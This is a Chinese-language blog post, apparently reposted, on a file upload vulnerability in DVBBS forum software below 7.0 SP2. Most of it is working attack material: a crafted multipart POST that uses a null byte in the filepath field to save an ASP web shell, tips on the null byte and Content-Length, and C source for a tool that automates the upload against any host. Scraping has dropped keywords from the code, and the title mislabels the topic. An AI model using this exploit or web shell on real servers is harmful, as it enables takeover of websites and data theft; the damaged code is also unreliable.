arp攻击原理:动网论坛上传文件漏洞的原理以及攻击的代码实现来源: 发布时间:星期四, 2009年2月12日 浏览:136次 评论:0
最近  段时间比较忙,没什么时间为组织做贡献(实在是没实力,呵呵).刚好前段时间听小猪(猪蛋儿  目前流行BBS安全性比较 文请参阅:http://wvw.ttian.net/forum/viewtopic.php?id=269)说动网论坛出了个上传任意文件漏洞,当时没如何明白.但是我看到最近NB论坛上全部都在讨论有关这方面问题,就研究了下,发现这个漏洞确实存在,而且非常严重,用小猪话说是DVBBS7.0 SP2以下通杀.虽然有些人已经知道了攻击思路方法,但是还是存在些问题.下面我就动网这个漏洞做下讲解.(不知道会不会被人骂, 这个漏洞实在太大了). 我们先看 下动网论坛上传文件相关代码: \'  =无组件上传(upload_0) sub upload_0   upload= UpFile_Class \'\'建立上传对象 upload.GetDate (  (Forum_Setting(56))*1024)\'取得上传数据,不限大小 iCount=0  upload.err > 0 then select  upload.err 1 Response.Write "请先选择你要上传 文件 [ <a href=# _disibledevent=> 2 Response.Write "图片大小超过了限制 "&Forum_Setting(56)&"K [ <a href=# _disibledevent=>end select exit sub  formPath=upload.form("filepath") \'\'在目录后加(/) right(formPath,1)<>"/" then formPath=formPath&"/" for each formName in upload.file \'\'列出所有上传了 文件 file=upload.file(formName) \'\'生成个文件对象 file.filesize<100 then response.write "请先选择你要上传 图片 [ <a href=# _disibledevent=>response.end end fileExt=l (file.FileExt) CheckFileExt(fileEXT)=false then response.write "文件格式不正确 [ <a href=# _disibledevent=>response.end end randomize ranNum= (90000*rnd)+10000 filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt file.FileSize>0 then\'\'如果 FileSize > 0 介绍说明有文件数据 file.SaveToFile Server.mappath(filename)\'\'保存文件 \' response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>" response.write "<script>parent.document.forms[0].myface.value=\'"&FileName&"\'</script>" iCount=iCount+1 end file=nothing next upload=nothing session("upface")="done" Htmend iCount&" 个文件上传结束!" end end sub 在上面代码中可以看到这样 句: filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt 这里,filename是保存 文件名,它是依照上传时间来命名,最后扩展名是表单中提交过来文件扩展名.但是 中对提交文件类型做了限制,显然想直接上传ASP文件是不可行.但是我们来看下做为后辍依据从哪里来呢?我们可以在reg_upload.asp中找到这样代码: <form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" > <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上传" _disibledevent=>parent.document.forms[0].Submit2.disabled=true;"> </form> 这样,我们知道了, 是提取file1表单和fname表单中值来做判断.也就是说直接从页面递交我们ASP文件也是行不通了,但是,如果是我们自己构造数据包话就不样了.欲望的翼提出思路方法就是自已构造数据包来达到欺骗目.将提交file1表单和fname表单项值改成合法文件名称.这样就可以绕过文件类型检测了. 当然,主要 问题不在这里,如果我们只是要上传那些代码话,我们完全可以直接改文件名就好了.我们目是要让我们上传文件名改成ASP,这样我们才可以利用.关键就在这句了: formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt 这句话将 段 串合并起来.我们能改就是formPath这个参数.在计算机中检测串关键就是看是否碰到\'\\0\',如果是,则认为串结束了.也就是说我们在构造上传文件保存路径时,只要欺骗计算机,让他认为类似"uploadface\\zwell.asp"这样路径参数已经结束了,这样,后面连串时间我们都可以不要,从而达到直接将文件保存为我们定义文件名目.因些,我们要做是在构造数据包中,将表单中filepath改成类似uploadface\\zwell.asp\'\\0\'串然后发送出去就行了.
我们先来看 下数据包格式(论坛上好像大家用是WSockExpert,不过我用是IRIS,我觉得更专业点,^_^): POST /forum/upfile.asp HTTP/1.1 Accept: image/g , image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: uyee.com Content-Length: 1593 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF -----------------------------7d4a325500d2 Content-Disposition: form-data; name="filepath" uploadFace\\zwell.asp -----------------------------7d4a325500d2 Content-Disposition: form-data; name="act" upload -----------------------------7d4a325500d2 Content-Disposition: form-data; name="file1"; filename="C:\\1.g " Content-Type: text/plain <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> <%on error resume next%> <%Set objFSO = Server.CreateObject("Scripting.File  Object")%> <% Trim(request("syfdpath"))<>"" then%> <%fdata = request("cyfddata")%> <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%> <%objCountFile.Write fdata%> <% err =0 then%> <%response.write "<font color=red>save Success!</font>"%> <% %> <%response.write "<font color=red>Save UnSuccess!</font>"%> <%end %> <%err.clear%> <%end %> <%objCountFile.Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%> <%Response.write "<form action=\'\'\'\' method=post>"%> <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%> <%Response.Write "<br>"%> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%> <%Response.write "<br>"%> <%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%> <%Response.write "<input type=submit value=save>"%> <%Response.write "</form>"%> -----------------------------7d4a325500d2 Content-Disposition: form-data; name="fname" C:\\1.g -----------------------------7d4a325500d2 Content-Disposition: form-data; name="Submit" 上传 -----------------------------7d4a325500d2-- 上面 数据我是在WIN2003下调试.按我前面讲,只要改几个地方就好了 1.Content-Disposition: form-data; name="file1"; filename="C:\\1.g " 2.Content-Disposition: form-data; name="fname" C:\\1.g 3.最重要 地方:uploadFace\\zwell.asp,如何加个空呢?用UltraEdit是个好思路方法,用16进制编辑,(\'\\0\'这个也占个位置,所以我们先打入空格,然后再在UltraEdit里将对就空格符20改成00). 至于,最前面 那段,直接从抓包工具中提取就是了.而且随便个都行.但是最重要是要注意这句: Content-Length: 1593 很多人测试都没成功,就 这个值设不对,其实这个值很好算,是从第个"-----------------------------7d4a325500d2"开始算起,到"-----------------------------7d4a325500d2--\\r\\n\\r\\n"截止,大家看到"\\r\\n"是起换行作用,占两个.我看论坛上大家论坛时都是说加个值就加,不是说不对,只是还要这样数,代码短倒无所谓,代码要是很长如何办呢?:),这里告诉大家个简单思路方法:打开记事本,将算长度代码复制到记事本,保存,然后看属性就目了然了,个都不会错.只是有点必须注意,必须将最后那几个换行也复制进来.很多人就是没有复制换行才失败. 写了这么多,我们也看到,每 个这样改太不方便,做了工具是必须了,呵呵,具体不多说了,部分代码如下: #  <winsock2.h> # <stdio.h> # "Resource.h" #pragmacomment(lib,"ws2_32.lib") HINSTANCEg_hInst; HWNDg_hWnd; HWNDm_up; HWNDm_host; HWNDm_webpath; HWNDm_path; HWNDm_filename; HWNDm_upload; DWORDm_theadid; BYTEsendbuf[10000]; charhost[80];//主机地址 charbbspath[50];//论坛地址 charuppath[20];//上传目录 charupfilename[50];//上传文件名 charupfiledata[8000];//上传文件内容 sendsize;//总传送数据大小 realsndsize = 0;//传送页面文件大小 charsnddata[8000]; charmm[1000]= "<%dim objFSO%>\\r\\n" "<%dim fdata%>\\r\\n" "<%dim objCountFile%>\\r\\n" "<%on error resume next%>\\r\\n" "<%Set objFSO = Server.CreateObject(\\"Scripting.File Object\\")%>\\r\\n" "<% Trim(request(\\"syfdpath\\"))<>\\"\\" then%>\\r\\n" "<%fdata = request(\\"cyfddata\\")%>\\r\\n" "<%Set objCountFile=objFSO.CreateTextFile(request(\\"syfdpath\\"),True)%>\\r\\n" "<%objCountFile.Write fdata%>\\r\\n" "<% err =0 then%>\\r\\n" "<%response.write \\"<font color=red>save Success!</font>\\"%>\\r\\n" "<% %>" "<%response.write \\"<font color=red>Save UnSuccess!</font>\\"%>\\r\\n" "<%end %>\\r\\n" "<%err.clear%>\\r\\n" "<%end %>" "<%objCountFile.Close%>\\r\\n" "<%Set objCountFile=Nothing%>\\r\\n" "<%Set objFSO = Nothing%>" "<%Response.write \\"<form action=\\\'\\\' method=post>\\"%>\\r\\n" "<%Response.Write \\"<input type=text name=syfdpath width=32 size=50>\\"%>\\r\\n" "<%Response.Write \\"<br>\\"%>\\r\\n" "<%=server.mappath(Request.ServerVariables(\\"SCRIPT_NAME\\"))%>\\r\\n" "<%Response.write \\"<br>\\"%>\\r\\n" "<%Response.write \\"<textarea name=cyfddata cols=80 rows=10 width=32></textarea>\\"%>\\r\\n" "<%Response.write \\"<input type=submit value=save>\\"%>\\r\\n" "<%Response.write \\"</form>\\"%>\\r\\n"; //获得Control控件文本 char *gettext(HWND chwnd) { char tmpbuf[10000]; SendMessage(chwnd, WM_GETTEXT, (WPARAM)  (tmpbuf), (LPARAM)tmpbuf);  tmpbuf; } //设置Control控件文本 void text(HWND chwnd,char *text) { SendMessage(chwnd, WM_SETTEXT, (WPARAM)(0), (LPARAM)text); } char *itos( data) { char tmp[10]; spr f(tmp, "%d", data); tmp; } //上传线程 DWORD WINAPI uploadthread(LPVOID param) { SOCKETs; sockaddr_in sin; struct hostent * hp; unsigned addr; s =  (AF_INET, SOCK_STREAM, IPPROTO_TCP);
ZeroMemory((void *)&sin, (sin)); hp = gethostbyname(gettext(m_host)); (!hp) addr = inet_addr(gettext(m_host)); ((!hp) && (addr INADDR_NONE) ) { MessageBox(g_hWnd, "Unable to resolve host", "sendbuf", MB_OK); 0; } (hp != NULL) memcpy(&(sin.sin_addr),hp->h_addr,hp->h_length); sin.sin_addr.s_addr = addr; sin.sin_port = htons(80); sin.sin_family = AF_INET; strcpy(host, gettext(m_host)); strcpy(bbspath, gettext(m_webpath)); strcpy(upfiledata, gettext(m_upload)); strcpy(uppath, gettext(m_path)); strcpy(upfilename, gettext(m_filename)); realsndsize = 578 + strlen(uppath) + strlen(upfilename) + strlen(upfiledata) + 1; spr f((char *)sendbuf, "POST %s/upfile.asp HTTP/1.1\\r\\n" "Accept: image/g , image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n" "Referer: http://192.168.10.101/a.asp?a=http://uyee.com/forum/upfile.asp\\r\\n" "Accept-Language: zh-cn\\r\\n" "Content-Type: multipart/form-data; boundary=---------------------------7d4a325500d2\\r\\n" "Accept-Encoding: gzip, deflate\\r\\n" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MyIE2; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\\r\\n" "Host: %s\\r\\n" "Content-Length: %d\\r\\n" "Connection: Keep-Alive\\r\\n" "Cache-Control: no-cache\\r\\n" "Cookie: iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDQCAQBAQT=NBDJCEFCMIICLJBJKHKMHJEF\\r\\n\\r\\n" "-----------------------------7d4a325500d2\\r\\n" "Content-Disposition: form-data; name=\\"filepath\\"\\r\\n\\r\\n" "%s\\\\%s", bbspath, host, realsndsize, uppath, upfilename); sendsize = strlen((char *)sendbuf); sendbuf[sendsize] = \'\\0\'; spr f(snddata, "\\r\\n" "-----------------------------7d4a325500d2\\r\\n" "Content-Disposition: form-data; name=\\"act\\"\\r\\n\\r\\n" "upload\\r\\n" "-----------------------------7d4a325500d2\\r\\n" "Content-Disposition: form-data; name=\\"file1\\"; filename=\\"C:\\\\1.g \\"\\r\\n" "Content-Type: text/plain\\r\\n\\r\\n" "%s\\r\\n" "-----------------------------7d4a325500d2\\r\\n" "Content-Disposition: form-data; name=\\"fname\\"\\r\\n\\r\\n" "C:\\\\1.g \\r\\n" "-----------------------------7d4a325500d2\\r\\n" "Content-Disposition: form-data; name=\\"Submit\\"\\r\\n\\r\\n" "上传\\r\\n" "-----------------------------7d4a325500d2--\\r\\n\\r\\n", upfiledata); strcat((char *)&sendbuf[sendsize+1], snddata); sendsize  strlen(snddata); sendsize 1; (SOCKET_ERROR connect(s, (struct sockaddr *)&sin, (sin))) { MessageBox(g_hWnd, "连接出错!", "出错提示:", MB_OK|MB_IConERROR); 0; } sendsz = send(s, (char *)sendbuf, sendsize, 0); (sendsz <= 0) MessageBox(g_hWnd, "发送数据失败", itos(WSAGetLastError ), MB_OK); char recvbuf[10000]; recv(s, (char*)recvbuf, 10000, 0); text(m_upload, recvbuf); close (s); 0; } void WINAPIOn_Command(WPARAM wParam) { switch (LOWORD(wParam)) { ID_UP: CreateThread(NULL, 0, uploadthread, NULL, NULL, &m_theadid);  ; IDCANCEL: SendMessage(g_hWnd, WM_CLOSE, (WPARAM)(NULL), LPARAM(NULL)); ; } }  BOOLCALLBACK MainDlgProc(HWND hWndDlg, UINT msg,WPARAM wParam, LPARAM lParam) { switch (msg) { WM_INITDIALOG: g_hWnd = hWndDlg; m_up = GetDlgItem(g_hWnd, ID_UP); m_host = GetDlgItem(g_hWnd, IDC_EDIT1); m_webpath = GetDlgItem(g_hWnd, IDC_EDIT2); m_path = GetDlgItem(g_hWnd, IDC_EDIT3); m_upload = GetDlgItem(g_hWnd, IDC_EDIT4); m_filename = GetDlgItem(g_hWnd, IDC_EDIT5); text(m_host, "192.168.10.101"); text(m_webpath, "/"); text(m_path, "uploadface"); text(m_filename, "zwell.asp"); text(m_upload, mm); TRUE; WM_COMMAND: On_Command(wParam); ; WM_SIZE: ; WM_CLOSE: EndDialog(g_hWnd,0); ; } FALSE; } APIENTRY WinMain(HINSTANCE hInstance, HINSTANCEhPrevInstance, LPSTR lpCmdLine,nCmdShow) { WSADATAwsaData; g_hInst=hInstance; (WSAStartup(MAKEWORD(1, 1), &wsaData)) { MessageBox(NULL,"无法  化WinsockDLL\\t"," ",MB_OK|MB_ICONSTOP); 0; } DialogBox(g_hInst, MAKEINTRESOURCE(IDD_DIALOG1),NULL, (DLGPROC)MainDlgProc); WSACleanup ; 1; } WINDOWS2003 + VC.NET WINDOWS2003 WINDOWS2000测试通过 0
相关文章读者评论发表评论 |
 |
专注于互联网--专注于架构 |
最新标签 网站地图 文章索引 Rss订阅 |
